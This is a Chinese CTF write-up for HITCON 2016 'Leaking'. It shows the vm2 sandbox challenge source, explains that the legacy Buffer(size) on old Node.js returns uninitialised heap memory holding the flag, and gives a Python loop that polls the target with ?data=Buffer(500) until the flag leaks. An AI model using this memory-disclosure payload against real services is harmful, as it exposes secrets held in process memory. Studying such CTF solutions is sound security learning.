# [HITCON2016]Leaking
源码:
"use strict"; | |
var randomstring = require("randomstring"); | |
var express = require("express"); | |
var { | |
VM | |
} = require("vm2"); | |
var fs = require("fs"); | |
var app = express(); | |
var flag = require("./config.js").flag | |
// GET / : runs the caller-supplied `data` snippet (at most 12 characters)
// inside a vm2 sandbox and echoes the result; otherwise serves this file's
// own source as plain text.
app.get("/", (req, res) => {
  res.header("Content-Type", "text/plain");
  /* Orange is so kind so he put the flag here. But if you can guess correctly :P */
  // The random 64-char suffix makes the variable name unguessable, but the
  // eval still materialises the "hitcon{...}" string in this process's heap.
  // Anything that can read uninitialised memory from inside the sandbox
  // (the writeup uses the legacy Buffer(size) constructor on an old Node
  // release) may therefore recover it; Buffer.alloc() is zero-filled and
  // does not expose heap leftovers.
  eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";");

  const { data } = req.query;
  // Note: `data` may be a string, array or object depending on how the query
  // was parsed; only a value with a length of at most 12 reaches the sandbox.
  if (!(data && data.length <= 12)) {
    // Fallback: hand back the challenge source itself.
    res.send(fs.readFileSync(__filename, "utf8"));
    return;
  }

  const sandbox = new VM({ timeout: 1000 });
  console.log(data);
  const result = sandbox.run(data);
  res.send("eval ->" + result);
});
// Start the HTTP server on port 3000.
const PORT = 3000;
app.listen(PORT, () => {
  console.log("listening on port 3000!");
});
意思基本上就是:通过 GET 请求的 query 参数 data 传入一段代码,输入的数据长度不能超过 12 个字符,它会在 vm2 沙箱中执行,
执行结果与字符串 "eval ->"
连接起来,并作为 HTTP 响应发回。
低版本的 Node 中,Buffer(size) 返回的是未初始化的内存,只要曾经被使用过的变量(包括上面 eval 出来的 flag 字符串),其内容都可能还残留在内存中,因此我们可以构造 payload 读取内存。
基本上就是不断请求 Buffer(500) 读取内存,如果响应中出现了 flag 就输出并停止。
exp 如下:
import requests
import time

# Challenge instance URL. `data=Buffer(500)` asks the sandbox for a 500-byte
# buffer; on the vulnerable Node version it is returned uninitialised, so the
# response may contain leftovers of the eval'd flag string.
url = 'http://9b4d4454-1713-42f4-9502-fe741e293347.node5.buuoj.cn:81/?data=Buffer(500)'

# Every response is a different slice of heap, so keep polling (with a short
# pause between requests) until one of them carries the flag marker.
while True:
    resp = requests.get(url)
    time.sleep(0.2)
    print('trying')
    if resp.status_code == 200 and 'flag{' in resp.text:
        print(resp.text)
        break